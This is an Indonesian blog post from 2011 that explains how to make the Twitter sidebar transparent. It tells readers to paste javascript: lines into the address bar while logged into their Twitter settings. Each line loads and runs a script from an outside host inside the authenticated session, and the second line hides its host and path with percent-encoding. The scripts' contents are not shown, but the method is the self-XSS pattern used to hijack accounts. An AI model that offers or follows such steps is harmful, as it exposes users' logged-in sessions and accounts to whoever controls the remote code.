Monday, February 14, 2011

Cara Membuat Sidebar Twitter Transparan


Hoho, ini cara buat sidebar (bagian sebelah kanan di twitter, biasanya diisi list, following, followers, dll) menjadi transparan. Nah gimana caranya biar sidebar twitter transparan? Simple kok!Pertama: Login ke twitter dan buka menu setting, terus design. Ato bisa juga http://twitter.com/settings/design
Kedua: Copy kode dibawah ini yaa:

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http%3A%2F%2Fwww.justinparks.com%2Ftwitter%2Ftwitter-sidebar.js';void(0);
Ketiga: Buka http://www.twitter.com/settings/design tadi, terus http://www.twitter.com/settings/designya dihapus dan diganti sama kode diatas tadi.

terus di Enter aja deh.
Keempat: Liat apa ada message kaya ini ato enggak, untuk ngebuktiin berhasil apa kaga:


SELESAI! Lo bisa liat perubahannya di halaman Profile. Jangan lupa klik 'Save Changes'! Kalo ga di klik ga bakal jadi jadi ini sidebar transparan :P

Nah, kalo nanti lo pengen sidebar lo normal lagi, login ke halaman design lagi terus pilih "
Change Background Style" ke background lama lo ato yang baru terserah. Udah itu lo save deh. Jangan lupa follow gue juga buat tanya tanya :P

NEW Ada alternatif baru. Semoga bisa ya :)

javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://%77%65%62%64%69%63%61%73%2E%6F%72%67/scripts/%74%77%69%74%74%65%72%2E%74%72%61%6E%73%70%61%72%65%6E%74%65%32%32%32%2E%6A%73';void(0);

No comments:

Post a Comment

dont be afraid to comment here, I dont bite